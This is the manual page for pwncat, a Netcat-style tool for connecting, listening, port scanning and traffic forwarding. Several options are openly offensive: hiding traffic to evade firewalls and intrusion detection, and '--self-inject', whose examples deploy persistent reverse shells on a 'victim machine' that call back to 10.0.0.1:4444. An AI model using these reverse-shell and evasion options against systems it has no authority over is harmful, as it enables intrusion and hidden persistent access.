1PWNCAT:(1) User Commands PWNCAT:(1)
2
6 pwncat: - pwncat
7
9 usage: pwncat [options] hostname port
10 pwncat [options] -l [hostname] port pwncat [options] -z hostname
12 port pwncat [options] -L [addr:]port hostname port pwncat
13 [options] -R addr:port hostname port pwncat -V, --version pwncat
14 -h, --help
15 Enhanced and comptaible Netcat implementation written in Python (2 and
17 3) with connect, zero-i/o, listen and forward modes and techniques to
18 detect and evade firewalls and intrusion detection/prevention systems.
19 If no mode arguments are specified, pwncat will run in connect mode and
21 act as a client to connect to a remote endpoint. If the connection to
22 the remote endoint is lost, pwncat will quit. See options for how to
23 automatically reconnect.
24 positional arguments:
26 hostname
27 Address to listen, forward, scan or connect to.
28 port [All modes] Single port to listen, forward or connect to.
30 [Zero-I/O mode] Specify multiple ports to scan: Via list:
31 4444,4445,4446 Via range: 4444-4446 Via incr: 4444+2
32 mode arguments:
34 -l, --listen
35 [Listen mode]: Start a server and listen for incoming connec‐
36 tions. If using TCP and a connected client disconnects or the
37 connection is interrupted otherwise, the server will quit. See
38 -k/--keep-open to change this behaviour.
39 -z, --zero
41 [Zero-I/0 mode]: Connect to a remote endpoint and report status
42 only. Used for port scanning. See --banner for version detec‐
43 tion.
44 -L [addr:]port, --local [addr:]port
46 [Local forward mode]: This mode will start a server and a client
47 internally. The internal server will listen locally on speci‐
48 fied addr/port (given by --local [addr:]port). The server will
49 then forward traffic to the internal client which connects to
50 another server specified by hostname/port given via positional
51 arguments. (I.e.: proxies a remote service to a local address)
52 -R addr:port, --remote addr:port
54 [Remote forward mode]: This mode will start two clients inter‐
55 nally. One is connecting to the target and one is connecting to
56 another pwncat/netcat server you have started somewhere. Once
57 connected, it will then proxy traffic between you and the tar‐
58 get. This mode should be applied on machines that block incom‐
59 ing traffic and only allow outbound. The connection to your
60 listening server is given by -R/--remote addr:port and the con‐
61 nection to the target machine via the positional arguments.
62 optional arguments:
64 -e cmd, --exec cmd
65 Execute shell command. Only for connect or listen mode.
66 -C lf, --crlf lf
68 Specify, 'lf', 'crlf' or 'cr' to always force replacing line
69 endings for input and outout accordingly. Specify 'no' to com‐
70 pletely remove any line feeds. By default it will not replace
71 anything and takes what is entered (usually CRLF on Windows, LF
72 on Linux and some times CR on MacOS).
73 -n, --nodns
75 Do not resolve DNS.
76 --send-on-eof
78 Buffer data received on stdin until EOF and send everything in
79 one chunk.
80 --no-shutdown
82 Do not shutdown into half-duplex mode. If this option is
83 passed, pwncat won't invoke shutdown on a socket after seeing
84 EOF on stdin. This is provided for backward-compatibility with
85 OpenBSD netcat, which exhibits this behavior.
86 -v, --verbose
88 Be verbose and print info to stderr. Use -v, -vv, -vvv or -vvvv
89 for more verbosity. The server performance will decrease drasti‐
90 cally if you use more than three times.
91 --info type
93 Show additional info about sockets, IPv4/6 or TCP opts applied
94 to the current socket connection. Valid parameter are 'sock',
95 'ipv4', 'ipv6', 'tcp' or 'all'. Note, you must at least be in
96 INFO verbose mode in order to see them (-vv).
97 -c str, --color str
99 Colored log output. Specify 'always', 'never' or 'auto'. In
100 'auto' mode, color is displayed as long as the output goes to a
101 terminal. If it is piped into a file, color will automatically
102 be disabled. This mode also disables color on Windows by
103 default. (default: auto)
104 --safe-word str
106 All modes: If pwncat is started with this argument, it will shut
107 down as soon as it receives the specified string. The
108 --keep-open (server) or --reconn (client) options will be
109 ignored and it won't listen again or reconnect to you. Use a
110 very unique string to not have it shut down accidentally by
111 other input.
112 protocol arguments:
114 -4 Only Use IPv4 (default: IPv4 and IPv6 dualstack).
115 -6 Only Use IPv6 (default: IPv4 and IPv6 dualstack).
117 -u, --udp
119 Use UDP for the connection instead of TCP.
120 -T str, --tos str
122 Specifies IP Type of Service (ToS) for the connection. Valid
123 values are the tokens 'mincost', 'lowcost', 'reliability',
124 'throughput' or 'lowdelay'.
125 --http Connect / Listen mode (TCP and UDP): Hide traffic in http pack‐
127 ets to fool Firewalls/IDS/IPS.
128 --https
130 Connect / Listen mode (TCP and UDP): Hide traffic in https pack‐
131 ets to fool Firewalls/IDS/IPS.
132 -H [str [str ...]], --header [str [str ...]]
134 Add HTTP headers to your request when using --http(s).
135 command & control arguments:
137 --self-inject cmd:host:port[s]
138 Listen mode (TCP only): If you are about to inject a reverse
139 shell onto the victim machine (via php, bash, nc, ncat or simi‐
140 lar), start your listening server with this argument. This will
141 then (as soon as the reverse shell connects) automatically
142 deploy and background-run an unbreakable pwncat reverse shell
143 onto the victim machine which then also connects back to you
144 with specified arguments. Example: '--self-inject
145 /bin/bash:10.0.0.1:4444' It is also possible to launch multiple
146 reverse shells by specifying multiple ports. Via list:
147 --self-inject /bin/sh:10.0.0.1:4444,4445,4446 Via range:
148 --self-inject /bin/sh:10.0.0.1:4444-4446 Via incr:
149 --self-inject /bin/sh:10.0.0.1:4444+2 Note: this is currently an
150 experimental feature and does not work on Windows remote hosts
151 yet.
152 pwncat scripting engine:
154 --script-send file
155 All modes (TCP and UDP): A Python scripting engine to define
156 your own custom transformer function which will be executed
157 before sending data to a remote endpoint. Your file must contain
158 the exact following function which will: be applied as the
159 transformer: def transform(data, pse):
160 # NOTE: the function name must be 'transform'
162 # NOTE: the function param name must be 'data' # NOTE: indenta‐
163 tion must be 4 spaces # ... your transformations goes here
164 return data
165 You can also define as many custom functions or classes
167 within this file, but ensure to prefix them uniquely to not col‐
168 lide with pwncat's function or classes, as the file will be
169 called with exec().
170 --script-recv file
172 All modes (TCP and UDP): A Python scripting engine to define
173 your own custom transformer function which will be executed
174 after receiving data from a remote endpoint. Your file must con‐
175 tain the exact following function which will: be applied as the
176 transformer: def transform(data, pse):
177 # NOTE: the function name must be 'transform'
179 # NOTE: the function param name must be 'data' # NOTE: indenta‐
180 tion must be 4 spaces # ... your transformations goes here
181 return data
182 You can also define as many custom functions or classes
184 within this file, but ensure to prefix them uniquely to not col‐
185 lide with pwncat's function or classes, as the file will be
186 called with exec().
187 zero-i/o mode arguments:
189 --banner
190 Zero-I/O (TCP and UDP): Try banner grabbing during port scan.
191 listen mode arguments:
193 -k, --keep-open
194 Listen mode (TCP only): Re-accept new clients in listen mode
195 after a client has disconnected or the connection is unterrupted
196 otherwise. (default: server will quit after connection is gone)
197 --rebind [x]
199 Listen mode (TCP and UDP): If the server is unable to bind, it
200 will re-initialize itself x many times before giving up. Omit
201 the quantifier to rebind endlessly or specify a positive integer
202 for how many times to rebind before giving up. See
203 --rebind-robin for an interesting use-case. (default: fail
204 after first unsuccessful try).
205 --rebind-wait s
207 Listen mode (TCP and UDP): Wait x seconds between re-initializa‐
208 tion. (default: 1)
209 --rebind-robin port
211 Listen mode (TCP and UDP): If the server is unable to initialize
212 (e.g: cannot bind and --rebind is specified, it it will shuffle
213 ports in round-robin mode to bind to. Use comma separated
214 string such as '80,81,82,83', a range of ports '80-83' or an
215 increment '80+3'. Set --rebind to at least the number of ports
216 to probe +1 This option requires --rebind to be specified.
217 connect mode arguments:
219 --source-addr addr
220 Specify source bind IP address for connect mode.
221 --source-port port
223 Specify source bind port for connect mode.
224 --reconn [x]
226 Connect mode (TCP and UDP): If the remote server is not reach‐
227 able or the connection is interrupted, the client will connect
228 again x many times before giving up. Omit the quantifier to
229 retry endlessly or specify a positive integer for how many times
230 to retry before giving up. (default: quit if the remote is not
231 available or the connection was interrupted) This might be handy
232 for stable TCP reverse shells ;-) Note on UDP: By default UDP
233 does not know if it is connected, so it will stop at the first
234 port and assume it has a connection. Consider using --udp-scon‐
235 nect with this option to make UDP aware of a successful connec‐
236 tion.
237 --reconn-wait s
239 Connect mode (TCP and UDP): Wait x seconds between re-connects.
240 (default: 1)
241 --reconn-robin port
243 Connect mode (TCP and UDP): If the remote server is not reach‐
244 able or the connection is interrupted and --reconn is specified,
245 the client will shuffle ports in round-robin mode to connect to.
246 Use comma separated string such as '80,81,82,83', a range of
247 ports '80-83' or an increment '80+3'. Set --reconn to at least
248 the number of ports to probe +1 This helps reverse shell to
249 evade intrusiona prevention systems that will cut your connec‐
250 tion and block the outbound port. This is also useful in Con‐
251 nect or Zero-I/O mode to figure out what outbound ports are
252 allowed.
253 --ping-init
255 Connect mode (TCP and UDP): UDP is a stateless protocol unlike
256 TCP, so no handshake communication takes place and the client
257 just sends data to a server without being "accepted" by the
258 server first. This means a server waiting for an UDP client to
259 connect to, is unable to send any data to the client, before the
260 client hasn't send data first. The server simply doesn't know
261 the IP address before an initial connect. The --ping-init
262 option instructs the client to send one single initial ping
263 packet to the server, so that it is able to talk to the client.
264 This is a way to make a UDP reverse shell work. See --ping-word
265 for what char/string to send as initial ping packet (default:
266 '\0')
267 --ping-intvl s
269 Connect mode (TCP and UDP): Instruct the client to send ping
270 intervalls every s sec. This allows you to restart your UDP
271 server and just wait for the client to report back in. This
272 might be handy for stable UDP reverse shells ;-) See --ping-word
273 for what char/string to send as initial ping packet (default:
274 '\0')
275 --ping-word str
277 Connect mode (TCP and UDP): Change the default character '\0' to
278 use for upd ping. Single character or strings are supported.
279 --ping-robin port
281 Connect mode (TCP and UDP): Instruct the client to shuffle the
282 specified ports in round-robin mode for a remote server to ping.
283 This might be handy to scan outbound allowed ports. Use comma
284 separated string such as '80,81,82,83', a range of ports '80-83'
285 or an increment '80+3'. Use --ping-intvl 0 to be faster.
286 --udp-sconnect
288 Connect mode (UDP only): Emulating stateful behaviour for UDP
289 connect phase by sending an initial packet to the server to val‐
290 idate if it is actually connected. By default, UDP will simply
291 issue a connect and is not aware if it is really connected or
292 not. The default connect packet to be send is '\0', you can
293 change this with --udp-sconnect-word.
294 --udp-sconnect-word [str]
296 Connect mode (UDP only): Change the the data to be send for UDP
297 stateful connect behaviour. Note you can also omit the string to
298 send an empty packet (EOF), but be aware that some servers such
299 as netcat will instantly quit upon receive of an EOF packet.
300 The default is to send a null byte sting: '\0'.
301 misc arguments:
303 -h, --help
304 Show this help message and exit
305 -V, --version
307 Show version information and exit
308https://github.com/cytopia/pwncat June 2020 PWNCAT:(1)